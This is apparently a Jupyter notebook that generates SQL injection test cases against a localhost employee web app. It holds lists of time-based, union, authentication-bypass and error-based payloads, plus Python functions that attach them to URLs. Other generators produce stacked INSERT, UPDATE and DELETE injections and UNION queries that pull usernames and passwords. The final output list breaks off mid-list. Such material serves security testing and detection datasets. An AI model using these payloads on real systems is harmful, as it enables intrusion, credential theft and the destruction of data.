plain text inject

In [58]:
#Time Based SQL Injection
Time_Based =[''' ' ;waitfor delay '0:0:5'-- ''',
''' ' );waitfor delay '0:0:5'-- ''',
''' ' ;waitfor delay '0:0:5'-- ''',
''' ' );waitfor delay '0:0:5'-- ''',
''' ' ));waitfor delay '0:0:5'-- ''',
''' ' ));waitfor delay '0:0:5'-- ''',
''' ' benchmark(10000000,MD5(1))#''',
''' ' 1 or benchmark(10000000,MD5(1))#''',
''' '(1)r benchmark(10000000,MD5(1))#''',
''' ' or benchmark(10000000,MD5(1))#''',
''' ' 1) or benchmark(10000000,MD5(1))#''',
''' ' ) or benchmark(10000000,MD5(1))#''',
''' ' ) or benchmark(10000000,MD5(1))#''',
''' ' 1)) or benchmark(10000000,MD5(1))#''',
''' ' )) or benchmark(10000000,MD5(1))#''',
''' ' 1 or pg_sleep(5)-- ''',
''' ' (1)r pg_sleep(5)-- ''',
''' ' or pg_sleep(5)-- ''',
''' ' 1) or pg_sleep(5)-- ''',
''' ' ) or pg_sleep(5)-- ''',
''' ' ) or pg_sleep(5)-- ''',
''' ' 1)) or pg_sleep(5)-- ''',
''' ' )) or pg_sleep(5)-- ''',
''' ' )) or pg_sleep(5)-- ''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' ''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- ''',
''' ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#''',
''' ' SLEEP(5)#''',
''' ' SLEEP(5)-- ''',
''' ' SLEEP(5)=" ''',
''' ' (1)r SLEEP(5)''',
''' ' (1)r SLEEP(5)#''',
''' ' (1)r SLEEP(5)-- ''',
''' ' (1)r SLEEP(5)="''',
''' ' waitfor delay '00:00:05' ''',
''' ' waitfor delay '00:00:05'-- ''',
''' ' waitfor delay '00:00:05'#''',
''' ' benchmark(50000000,MD5(1))''',
''' ' benchmark(50000000,MD5(1))-- ''',
''' ' benchmark(50000000,MD5(1))#''']

In [59]:
#Union Select
union_based = [ 
     " ' ORDER BY SLEEP(5)#",
     " ' ORDER BY 1,SLEEP(5)#",
     " ' ORDER BY 1,SLEEP(5),3#",
     " ' ORDER BY 1,SLEEP(5),3,4#",
     ''' ' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5#''',
     " ' ORDER BY SLEEP(5)-- ",
     " ' ORDER BY 1,SLEEP(5)-- ",
     " ' ORDER BY 1,SLEEP(5),3-- ",
     " ' ORDER BY 1,SLEEP(5),3,4-- ",
     ''' ' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5-- ''',
     " ' UNION ALL SELECT 1",
     " ' UNION ALL SELECT 1,2",
     " ' UNION ALL SELECT 1,2,3",
     " ' UNION ALL SELECT 1#",
     " ' UNION ALL SELECT 1,2#",
     " ' UNION ALL SELECT 1,2,3#",
     " ' UNION ALL SELECT 1,2,3,4#",
     " ' UNION ALL SELECT 1-- ",
     " ' UNION ALL SELECT 1,2-- ",
     " ' UNION ALL SELECT 1,2,3-- ",
     " ' UNION ALL SELECT 1,2,3,4-- ",
     " ' UNION SELECT @@VERSION,SLEEP(5),3",
     " ' UNION SELECT @@VERSION,SLEEP(5),USER(),4",
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5,6''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),4#''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5#''',
     ''' ' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5,6#''',
     ''' ' UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5("A")),NULL,NULL -- ''',
     ''' ' UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5("A")),NULL,NULL,NULL -- '''
     ]

In [60]:
Bypass = [
    ''' ' or true -- ''",
    " ' or true -- ",
    " ' or true -- ",
    " ) or true -- ",
    " ') or true -- ",
    " ' or 'x'='x",
    " ') or ('x')=('x",
    " ') or (('x'))=(('x",
    ''' ' or "x"="x ''',
    ''' ') or ("x")=("x ''',
    ''' ')) or (("x"))=(("x ''',
    " ' or 1=1",
    " ' or 1=1-- ",
    " ' or 1=1#",
    " ' or 1=1/*",
    " ' -- ",
    "' #",
    "'/*",
    "' or '1'='1",
    "' or '1'='1'-- ",
    "' or '1'='1'#",
    "' or '1'='1'/*",
    "'or 1=1 or ''='",
    "' or 1=1",
    "' or 1=1-- ",
    "' or 1=1#",
    "' or 1=1/*",
    "') or ('1'='1",
    "') or ('1'='1'-- ",
    "') or ('1'='1'#",
    "') or ('1'='1'/*",
    "') or '1'='1",
    "') or '1'='1'-- ",
    "') or '1'='1'#",
    "') or '1'='1'/*",
    ''' 1234 ' AND 1=0 UNION ALL SELECT 'admin", '81dc9bdb52d04dc20036dbd8313ed055 ''',
    ''' \" -- " ''',
    ''' \" #''',
    ''' \"/*''',
    ''' \' Or \"1\"=\"1 ''',
    ''' \' Or \"1\"=\"1\"-- ''',
    ''' \' Or \"1\"=\"1\"# ''',
    ''' \' Or \"1\"=\"1\"/* ''',
    ''' \"or 1=1 or \"\"=\" ''',
    ''' \' Or 1=1''',
    ''' \' Or 1=1-- ''',
    ''' \' Or 1=1#''',
    ''' \' Or 1=1/*''',
    ''' \") or (\"1\"=\"1''',
    ''' \") or (\"1\"=\"1\"-- ''',
    ''' \") or (\"1\"=\"1\"#''',
    ''' \") or (\"1\ '''
    ]

Gen-test-case!

In [24]:
import random

In [62]:
# errorbase -->
# Time_Based[]
# Bypass[]
table_name = ["employee","customer","service","users"]
user = ['lnwza007','eiei123']

In band
1.error-based
2.union

In [63]:
errorbase=[
"OR 1=1#",
"OR 1=0#",
"OR x=x#",
"OR x=y#",
"OR 1=1-- ",
"OR 1=0-- ",
"OR x=x-- ",
"OR x=y-- ",
"OR 3409=3409 AND ('pytW' LIKE 'pytW",
"OR 3409=3409 AND ('pytW' LIKE 'pytY",
"HAVING 1=1",
"HAVING 1=0",
"HAVING 1=1#",
"HAVING 1=0#",
"HAVING 1=1-- ",
"HAVING 1=0-- ",
"AND 1=1",
"AND 1=0",
"AND 1=1-- ",
"AND 1=0-- ",
"AND 1=1#",
"AND 1=0#",
"AND 1=1 AND '%'='",
"AND 1=0 AND '%'='",
"AND 1083=1083 AND (1427=1427",
"AND 7506=9091 AND (5913=5913",
"AND 1083=1083 AND ('1427=1427",
"AND 7506=9091 AND ('5913=5913",
"AND 7300=7300 AND 'pKlZ'='pKlZ",
"AND 7300=7300 AND 'pKlZ'='pKlY",
"AND 7300=7300 AND ('pKlZ'='pKlZ",
"AND 7300=7300 AND ('pKlZ'='pKlY",
"AS INJECTX WHERE 1=1 AND 1=1",
"AS INJECTX WHERE 1=1 AND 1=0",
"AS INJECTX WHERE 1=1 AND 1=1#",
"AS INJECTX WHERE 1=1 AND 1=0#",
"AS INJECTX WHERE 1=1 AND 1=1-- ",
"AS INJECTX WHERE 1=1 AND 1=0-- ",
"WHERE 1=1 AND 1=1",
"WHERE 1=1 AND 1=0",
"WHERE 1=1 AND 1=1#",
"WHERE 1=1 AND 1=0#",
"WHERE 1=1 AND 1=1-- ",
"WHERE 1=1 AND 1=0-- ",
"ORDER BY 1-- ",
"ORDER BY 2-- ",
"ORDER BY 3-- ",
"ORDER BY 4-- ",
"ORDER BY 5-- ",
"ORDER BY 6-- ",
"ORDER BY 7-- ",
"ORDER BY 8-- ",
"ORDER BY 9-- ",
"ORDER BY 10-- ",
"ORDER BY 11-- ",
"ORDER BY 12-- ",
"ORDER BY 13-- ",
"ORDER BY 14-- ",
"ORDER BY 15-- ",
"ORDER BY 16-- ",
"ORDER BY 17-- ",
"ORDER BY 18-- ",
"ORDER BY 19-- ",
"ORDER BY 20-- ",
"ORDER BY 21-- ",
"ORDER BY 22-- ",
"ORDER BY 23-- ",
"ORDER BY 24",
"ORDER BY 25",
"ORDER BY 26",
"ORDER BY 27",
"ORDER BY 28",
"ORDER BY 29",
"ORDER BY 30",
"ORDER BY 31337",
"RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
"RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
"IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- ",
"IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- ",
"%' AND 8310=8310 AND '%'='",
"%' AND 8310=8311 AND '%'='",
"and (select substring(@@version,1,1))='X'",
"and (select substring(@@version,1,1))='M'",
"and (select substring(@@version,2,1))='i'",
"and (select substring(@@version,2,1))='y'",
"and (select substring(@@version,3,1))='c'",
"and (select substring(@@version,3,1))='S'",
"and (select substring(@@version,3,1))='X'"]

In [64]:
def random_data(list_data):
    BP_gen=[]
    for i in range(30) :
        BP_gen.append(user[random.randint(0, len(user)-1)]+" ' "  +
        list_data[random.randint(0, len(list_data)-1)] )
    return BP_gen

In [65]:
random_data(errorbase)

["eiei123 ' %' AND 8310=8310 AND '%'='",
 "lnwza007 ' AND 1=1#",
 "eiei123 ' ORDER BY 4-- ",
 "eiei123 ' AND 7300=7300 AND 'pKlZ'='pKlZ",
 "eiei123 ' HAVING 1=0#",
 "lnwza007 ' ORDER BY 19-- ",
 "lnwza007 ' ORDER BY 10-- ",
 "eiei123 ' ORDER BY 5-- ",
 "eiei123 ' HAVING 1=1",
 "lnwza007 ' and (select substring(@@version,1,1))='M'"]

URL
(finished)

In [35]:
import random
url= "http://localhost:3000/employee?id="
see_able_col=["employee_id" ,
    "prefixname" ,
    "fname",
    "lname" ,
    "nickname" ,
    "email",
    "tel" ,
    "work_background" ,
    "graduation_certificate" ,
    "address" ,
    "id_card" ,
    "house_registration" ]
unsee_col=["price",
            "name",
            "tel",
            "email",
            "lname",
            "fname",
            "customer_id",
            "username",
            "password"
            ]
see_able_value= [("E001", "Mr.", "bobo1", "two1", "baba1", "E001@gmail.com", '0123456781' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340921", "123 r.xxxxx 54000"), 
       ("E002", "Mr.", "bobo2", "two2", "baba2", "E002@gmail.com", '0123456782' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340922", '123 r.xxxxx 54000'), 
       ("E003", "Mr.", "bobo3", "two3", "baba3", "E003@gmail.com", '0123456783' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340923", '123 r.xxxxx 54000'), 
       ("E004", "Mr.", "bobo4", "two4", "baba4", "E004@gmail.com", '0123456784' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340924", '123 r.xxxxx 54000'), 
       ("E005", "Mr.", "bobo5", "two5", "baba5", "E005@gmail.com", '0123456785' , "companyA, companyB", "XAU", "123 r.xxxxx 50200", "1530302340925", '123 r.xxxxx 54000')]
unsee_value={"price":["100","200","300","400"],
            "name":["A","B","C","D"],
            "tel":["0123456781", "0123456782"],
            "email":["E001@gmail.com", "E002@gmail.com"],
            "lname":["memo1", "memo2"],
            "fname":["one1", "one2"],
            "customer_id":["C001","C002"],
            "username":["lnwza007","eiei123"],
            "password":["123","123"]}

unsee_table =["users","service","customer"]

table_value ={"users":["username","password"],
              "service":["name","price"],
              "customer":["fname","customer_id","lname","email","tel"]
            }

In [67]:
unsee_t=unsee_table[random.randint(0, len(unsee_table)-1)]
print(unsee_t)
table_V=table_value[unsee_t][random.randint(0, len(table_value[unsee_t])-1)]
print(table_V)
unsee_v=unsee_value[table_V][random.randint(0, len(unsee_value[table_V])-1)]

print(unsee_v)

customer
email
E002@gmail.com

In [68]:
def random_urldata(url,list_data,value):
    gen=[]
    for i in range(30) :
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])
        +list_data[random.randint(0, len(list_data)-1)])
    return gen

In [69]:
random_urldata(url,errorbase,see_able_value)

["http://localhost:3000/employee?id=E002AND 1083=1083 AND ('1427=1427",
 'http://localhost:3000/employee?id=E004ORDER BY 14-- ',
 'http://localhost:3000/employee?id=E001AND 1=1',
 'http://localhost:3000/employee?id=E002AND 1=0-- ',
 'http://localhost:3000/employee?id=E004HAVING 1=0-- ',
 'http://localhost:3000/employee?id=E005OR x=x#',
 'http://localhost:3000/employee?id=E002HAVING 1=0#',
 'http://localhost:3000/employee?id=E004ORDER BY 24',
 'http://localhost:3000/employee?id=E004ORDER BY 8-- ',
 'http://localhost:3000/employee?id=E001ORDER BY 27',
 'http://localhost:3000/employee?id=E003HAVING 1=0#',
 'http://localhost:3000/employee?id=E003AS INJECTX WHERE 1=1 AND 1=1',
 'http://localhost:3000/employee?id=E005OR 1=0-- ',
 "http://localhost:3000/employee?id=E003AND 7300=7300 AND ('pKlZ'='pKlY",
 'http://localhost:3000/employee?id=E001ORDER BY 6-- ',
 'http://localhost:3000/employee?id=E005ORDER BY 21-- ',
 'http://localhost:3000/employee?id=E002AS INJECTX WHERE 1=1 AND 1=1#',
 'http://localhost:3000/employee?id=E004HAVING 1=1#',
 "http://localhost:3000/employee?id=E001OR 3409=3409 AND ('pytW' LIKE 'pytW",
 'http://localhost:3000/employee?id=E005ORDER BY 7-- ',
 'http://localhost:3000/employee?id=E003ORDER BY 6-- ',
 'http://localhost:3000/employee?id=E002ORDER BY 25',
 'http://localhost:3000/employee?id=E002ORDER BY 19-- ',
 'http://localhost:3000/employee?id=E002ORDER BY 18-- ',
 'http://localhost:3000/employee?id=E005OR 1=0-- ',
 'http://localhost:3000/employee?id=E002ORDER BY 27',
 'http://localhost:3000/employee?id=E002HAVING 1=1',
 'http://localhost:3000/employee?id=E003AND 1=0',
 "http://localhost:3000/employee?id=E001AND 1=0 AND '%'='",
 'http://localhost:3000/employee?id=E001IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- ']

In [70]:
def randomunion_urldata(url,list_data,value):
    gen=[]
    for i in range(30) :
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])
        +list_data[random.randint(0, len(list_data )-1)])
    return gen

In [71]:
randomunion_urldata(url,union_based ,see_able_value)

['http://localhost:3000/employee?id=E005 \' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5#',
 "http://localhost:3000/employee?id=E002 ' UNION SELECT @@VERSION,SLEEP(5),USER(),4#",
 "http://localhost:3000/employee?id=E002 ' UNION ALL SELECT 1-- ",
 'http://localhost:3000/employee?id=E001 \' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5#',
 "http://localhost:3000/employee?id=E001 ' ORDER BY SLEEP(5)-- ",
 "http://localhost:3000/employee?id=E004 ' UNION ALL SELECT 1-- ",
 'http://localhost:3000/employee?id=E002 \' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5-- ',
 "http://localhost:3000/employee?id=E002 ' UNION ALL SELECT 1#",
 "http://localhost:3000/employee?id=E004 ' UNION ALL SELECT 1,2",
 "http://localhost:3000/employee?id=E004 ' UNION ALL SELECT 1,2,3,4-- ",
 'http://localhost:3000/employee?id=E002 \' ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5("A")),4,5#',
 'http://localhost:3000/employee?id=E002 \' UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5("A")),NULL,NULL,NULL -- ',
 "http://localhost:3000/employee?id=E004 ' UNION ALL SELECT 1,2-- ",
 "http://localhost:3000/employee?id=E001 ' UNION ALL SELECT 1,2,3,4-- ",
 "http://localhost:3000/employee?id=E004 ' UNION SELECT @@VERSION,SLEEP(5),3",
 "http://localhost:3000/employee?id=E002 ' UNION ALL SELECT 1,2#",
 "http://localhost:3000/employee?id=E003 ' UNION ALL SELECT 1,2,3,4#",
 "http://localhost:3000/employee?id=E001 ' UNION ALL SELECT 1,2,3,4#",
 "http://localhost:3000/employee?id=E001 ' UNION ALL SELECT 1,2#",
 "http://localhost:3000/employee?id=E002 ' ORDER BY 1,SLEEP(5)-- ",
 "http://localhost:3000/employee?id=E003 ' UNION ALL SELECT 1#",
 "http://localhost:3000/employee?id=E004 ' UNION ALL SELECT 1,2#",
 "http://localhost:3000/employee?id=E001 ' ORDER BY 1,SLEEP(5),3#",
 "http://localhost:3000/employee?id=E003 ' UNION ALL SELECT 1#",
 "http://localhost:3000/employee?id=E003 ' ORDER BY 1,SLEEP(5)-- ",
 'http://localhost:3000/employee?id=E002 \' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5',
 "http://localhost:3000/employee?id=E002 ' UNION ALL SELECT 1,2,3,4#",
 'http://localhost:3000/employee?id=E003 \' UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5("A")),NULL,NULL,NULL -- ',
 'http://localhost:3000/employee?id=E003 \' UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5("A")),5,6',
 "http://localhost:3000/employee?id=E003 ' UNION ALL SELECT 1,2#"]

In [44]:
def randomunionWrealdata_urldata(url,value,table_value,unsee_table,unsee_value):
    gen=[]
    for i in range(10) :
        unsee_t=unsee_table[random.randint(0, len(unsee_table)-1)] #select table
        table_V=table_value[unsee_t][random.randint(0, len(table_value[unsee_t])-1)] # colum
        unsee_v=unsee_value[table_V][random.randint(0, len(unsee_value[table_V])-1)] # value in that column
        random_table_value=random.randint(0, len(value)-1)
        gen.append(url+(value[random_table_value][0])+" ' "
        +"UNION SELECT "+ table_V + " " + "FROM " +unsee_t+ "-- ")
    return gen

In [45]:
randomunionWrealdata_urldata(url,see_able_value,table_value,unsee_table,unsee_value)

["http://localhost:3000/employee?id=E003 ' UNION SELECT name FROM service-- ",
 "http://localhost:3000/employee?id=E002 ' UNION SELECT password FROM users-- ",
 "http://localhost:3000/employee?id=E005 ' UNION SELECT name FROM service-- ",
 "http://localhost:3000/employee?id=E003 ' UNION SELECT username FROM users-- ",
 "http://localhost:3000/employee?id=E003 ' UNION SELECT username FROM users-- ",
 "http://localhost:3000/employee?id=E004 ' UNION SELECT password FROM users-- ",
 "http://localhost:3000/employee?id=E003 ' UNION SELECT username FROM users-- ",
 "http://localhost:3000/employee?id=E001 ' UNION SELECT customer_id FROM customer-- ",
 "http://localhost:3000/employee?id=E001 ' UNION SELECT name FROM service-- ",
 "http://localhost:3000/employee?id=E004 ' UNION SELECT username FROM users-- "]

In [ ]:
random_urldata(url,Time_Based,see_able_value)

["http://localhost:3000/employee?id=E002 ' AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' ",
 "http://localhost:3000/employee?id=E002 ' 1)) or pg_sleep(5)-- ",
 "http://localhost:3000/employee?id=E005 ' )) or benchmark(10000000,MD5(1))#",
 "http://localhost:3000/employee?id=E003 ' ));waitfor delay '0:0:5'-- ",
 "http://localhost:3000/employee?id=E003 ' 1)) or benchmark(10000000,MD5(1))#",
 "http://localhost:3000/employee?id=E003 ' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- ",
 "http://localhost:3000/employee?id=E005 ' (1)r SLEEP(5)-- ",
 "http://localhost:3000/employee?id=E005 ' ) or pg_sleep(5)-- ",
 "http://localhost:3000/employee?id=E003 ' ;waitfor delay '0:0:5'-- ",
 "http://localhost:3000/employee?id=E002 ' 1)) or pg_sleep(5)-- "]

In [1]:
import string
import random

showList = ["DATABASES", "TABLES", "COLUME"]

last = ["#", "# ", "-- "]
table =["users","service","customer", "employee"]

table_value ={"users":["username","password"],
              "service":["name","price"],
              "customer":["fname","customer_id","lname","email","tel"],
              "employee":["employee_id", "prefixname", "fname", "lname", "nickname", "email", "tel", "work_background", "graduation_certificate", "address", "id_card", "house_registration"]
            }

type_of_value = {"username":"str",
"fname":"str",
"lname":"str",
"name":"str",
"prefixname":"str",
"nickname":"str",
"password":"both",
"customer_id":"both",
"email":"both",
"employee_id":"both",
"work_background":"both",
"graduation_certificate":"both",
"address":"both",
"house_registration":"both",
"tel":"tel",
"price":"price",
"id_card":"id_card"}

customer_value = [{"username":"Emma","password":"u8N6tK9g"},{"username1":"Noah","password1":"p7H5jM6z"},
{"username":"Olivia","password":"h9L8kQ2t"},{"username1":"Liam","password1":"z5T8gP9u"},
{"username":"Ava","password":"b8K6tH7m"},{"username1":"Mason","password1":"y2Q9uH5t"},
{"username":"Sophia","password":"m6J8hK7z"},{"username1":"Jacob","password1":"w8T6pH9g"},
{"username":"Isabella","password":"x5P9uN8t"},{"username1":"William","password1":"g8K7tZ9h"},
{"username":"Mia","password":"t8J6pH7u"},{"username1":"Ethan","password1":"y9L8kQ5t"},
{"username":"Charlotte","password":"m7H9jK8z"},{"username1":"James","password1":"w6T7pH5g"},
{"username":"Amelia","password":"x8P6uN7t"},{"username1":"Alexander","password1":"g7K9tZ8h"},
{"username":"Abigail","password":"t6J8pH9u"},{"username1":"Michael","password1":"y5L7kQ8t"},
{"username":"Emily","password":"m8H6jK9z"},{"username1":"Benjamin","password1":"w7T9pH6g"},
{"username":"Elizabeth","password":"x6P8uN5t"},{"username1":"Matthew","password1":"g9K7tZ7h"},
{"username":"Avery","password":"t8J9pH6u"},{"username1":"Daniel","password1":"y7L8kQ9t"},
{"username":"Sofia","password":"m6H7jK8z"},{"username1":"Joseph","password1":"w5T6pH7g"},
{"username":"Evelyn","password":"x9P7uN8t"},{"username1":"Samuel","password1":"g7K8tZ9h"},
{"username":"Aubrey","password":"t7J6pH8u"},{"username1":"Christopher","password1":"y8L9kQ7t"},
{"username":"Harper","password":"m9H7jK6z"},{"username1":"Nathan","password1":"w6T8pH5g"},
{"username":"Aria","password":"x7P9uN7t"},{"username1":"Ryan","password1":"g8K7tZ9h"},
{"username":"Adalynn","password":"t6J8pH9u"},{"username1":"Andrew","password1":"y5L7kQ8t"},
{"username":"Ellie","password":"m8H6jK9z"},{"username1":"Oliver","password1":"w7T9pH6g"},
{"username":"Scarlett","password":"x6P8uN5t"},{"username1":"Henry","password1":"g9K7tZ7h"},
{"username":"Aaliyah","password":"t8J9pH6u"},{"username1":"Jaxon","password1":"y7L8kQ9t"}]


def generate_random_string_both() -> str:
    length = random.randint(1, 15)
    letters = string.ascii_letters + string.digits
    return ''.join(random.choice(letters) for i in range(length))

def generate_random_string_str() -> str:
    length = random.randint(1, 15)
    letters = string.ascii_letters
    return ''.join(random.choice(letters) for i in range(length))

def generate_random_string_tel() -> str:
    return "0" + str(random.randint(100000000, 999999999))

def generate_random_string_id_card() -> str:
    return "1" + str(random.randint(500000000000, 999999999999))

def generate_random_string_price() -> str:
    letters = string.digits
    return ''.join(random.choice(letters) for i in range(3))

In [18]:
def randomInsert(table, table_value, last):
    gen=[]
    for i in range(10) :
        typeOfValue=[]
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        gen.append("';"+" INSERT INTO " + random_table + "(")
        numOfParam=random.randint(1, len(table_value[random_table])-1)
        for j in range(numOfParam) :
            while True:
                random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                if random_table_value not in gen[i]:
                    typeOfValue.append(type_of_value[random_table_value])
                    break
                continue 
                
            gen[i] += random_table_value
            if j != numOfParam-1 :
                gen[i] += ", "
        gen[i] += ") VALUES("
        for j in range(numOfParam) :

            random_string=""
            first = typeOfValue.pop(0)
            if first == "tel":
                random_string = generate_random_string_tel()
            elif first == "price":
                random_string = generate_random_string_price()
            elif first == "id_card":
                random_string = generate_random_string_id_card()
            elif first == "str":
                random_string = generate_random_string_str()
            elif first == "both":
                random_string = generate_random_string_both()
                
            gen[i] += random_string
            if j != numOfParam-1 :
                gen[i] += ", "
        gen[i] += ")" + random_last
    return gen

In [19]:
randomInsert(table, table_value, last)

["'; INSERT INTO users(username) VALUES(J)-- ",
 "'; INSERT INTO users(password) VALUES(zg3xeMg2WkWd6a)#",
 "'; INSERT INTO employee(work_background, fname, lname, employee_id, nickname) VALUES(Blee27mXJk0uj5, DgpzUdZkmLLyM, EO, Y, awdcGLaKohd)-- ",
 "'; INSERT INTO employee(address, house_registration, work_background, nickname) VALUES(mcfuKnGJU404Ld, uJw0uRztoAz, StXQjWO3unqAMDN, DkKpT)# ",
 "'; INSERT INTO users(password) VALUES(diF8SbRsZbSM)-- ",
 "'; INSERT INTO customer(customer_id, tel) VALUES(m7YDj, 0803609663)#",
 "'; INSERT INTO users(password) VALUES(NqmmV)-- ",
 "'; INSERT INTO service(price) VALUES(600)# ",
 "'; INSERT INTO employee(employee_id, lname, nickname, email, fname) VALUES(rH, CIxdNt, Xj, oVgCYVcd, Vh)# ",
 "'; INSERT INTO users(username) VALUES(clkmkimyn)# "]

In [ ]:
def randomUpdate(table, table_value, last):
    gen=[]
    for i in range(30) :
        typeOfValue=[]
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        gen.append("';" + " UPDATE " + random_table + " SET ")
        numOfParam=random.randint(1, len(table_value[random_table])-1)
        for j in range(numOfParam) :
            while True:
                random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
                if random_table_value not in gen[i]:
                    typeOfValue.append(type_of_value[random_table_value])
                    break
                continue 
            
            random_string=""
            first = typeOfValue.pop(0)
            if first == "tel":
                random_string = generate_random_string_tel()
            elif first == "price":
                random_string = generate_random_string_price()
            elif first == "id_card":
                random_string = generate_random_string_id_card()
            elif first == "str":
                random_string = generate_random_string_str()
            elif first == "both":
                random_string = generate_random_string_both()

            gen[i] += random_table_value + " = " + random_string
            if j != numOfParam-1 :
                gen[i] += ", "
        random_table_value2=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
        first2 = type_of_value[random_table_value2]

        random_string2=""
        if first2 == "tel":
            random_string2 = generate_random_string_tel()
        elif first2 == "price":
            random_string2 = generate_random_string_price()
        elif first2 == "id_card":
            random_string2 = generate_random_string_id_card()
        elif first2 == "str":
            random_string2 = generate_random_string_str()
        elif first2 == "both":
            random_string2 = generate_random_string_both()
            
        gen[i] += " WHERE " + random_table_value2 + " = " + random_string2 +random_last
        
    return gen

In [ ]:
randomUpdate(table, table_value, last)

["'; UPDATE service SET name = HR WHERE name = wwGD-- ",
 "'; UPDATE users SET username = rRpObdfQ WHERE username = qsRtsEkJQcL#",
 "'; UPDATE employee SET graduation_certificate = dTDSwyYCQpgNUJ, work_background = NYc8xAHQc5oYZeR, fname = NKrNOoSoBXh, nickname = PwzvkHYztHaw, email = VeBp9BWH, lname = GIU WHERE id_card = 1957531658265# ",
 "'; UPDATE employee SET email = CUnwa WHERE lname = DuAfaOyqM-- ",
 "'; UPDATE employee SET nickname = IAIUBJgk, employee_id = mcmVDZCr, id_card = 1987217052924, work_background = 689v, graduation_certificate = XGRKyE09kAdSL, address = YSNFHhkytn, fname = QfLazOtMPrvLey, house_registration = BYdbDV WHERE address = kbUQTc# ",
 "'; UPDATE service SET price = 880 WHERE name = IBKZfjBHFd-- ",
 "'; UPDATE service SET name = gzCjYTnQLYi WHERE price = 827# ",
 "'; UPDATE users SET username = DVpovEAZ WHERE password = 5sp-- ",
 "'; UPDATE employee SET lname = DZ, prefixname = fVDl, address = H, nickname = rLE, id_card = 1546581740916, work_background = 4ry7Z, employee_id = XqT6Ck, tel = 0704087581, fname = zq WHERE prefixname = zvXqCTiJaLuTDw#",
 "'; UPDATE employee SET prefixname = s, employee_id = fOsGc, email = ROEWZ3, id_card = 1582145875368, fname = WOelaMMFF, house_registration = ZsqXYwl WHERE fname = IivkhRrABfMs#"]

In [16]:
def randomDelete(table, table_value, last):
    gen=[]
    for i in range(30) :
        random_table=table[random.randint(0, len(table)-1)]
        random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
        random_last=last[random.randint(0, len(last)-1)]
        first = type_of_value[random_table_value]
        if first == "tel":
            random_string = generate_random_string_tel()
        elif first == "price":
            random_string = generate_random_string_price()
        elif first == "id_card":
            random_string = generate_random_string_id_card()
        elif first == "str":
            random_string = generate_random_string_str()
        elif first == "both":
            random_string = generate_random_string_both()
        
        gen.append(''' "; ''' +"DELETE FROM " + random_table + " WHERE " + random_table_value + " = " + random_string +random_last)
    return gen

In [17]:
randomDelete(table, table_value, last)

['"; DELETE FROM employee WHERE prefixname = KPcqs# ',
 '"; DELETE FROM customer WHERE fname = SGwbOYihAEXeHAk#',
 '"; DELETE FROM employee WHERE fname = mkLFwlmadsamnci# ',
 '"; DELETE FROM employee WHERE address = UboLZw# ',
 '"; DELETE FROM customer WHERE lname = w#',
 '"; DELETE FROM employee WHERE fname = Eoz#',
 '"; DELETE FROM users WHERE password = 98hkNztci5vH-- ',
 '"; DELETE FROM users WHERE password = ueIgWjaDNQ-- ',
 '"; DELETE FROM employee WHERE prefixname = mq# ',
 '"; DELETE FROM customer WHERE lname = gPApGm-- ',
 '"; DELETE FROM users WHERE password = krB#',
 '"; DELETE FROM users WHERE password = 3cGHMYWeP# ',
 '"; DELETE FROM users WHERE password = X43Hc# ',
 '"; DELETE FROM customer WHERE lname = GEFnDGdOSu#',
 '"; DELETE FROM customer WHERE customer_id = LxrZiBSnrsQgxx-- ',
 '"; DELETE FROM users WHERE username = TdE-- ',
 '"; DELETE FROM customer WHERE lname = ePCHrnmv-- ',
 '"; DELETE FROM service WHERE price = 542#',
 '"; DELETE FROM users WHERE username = gyeSZ# ',
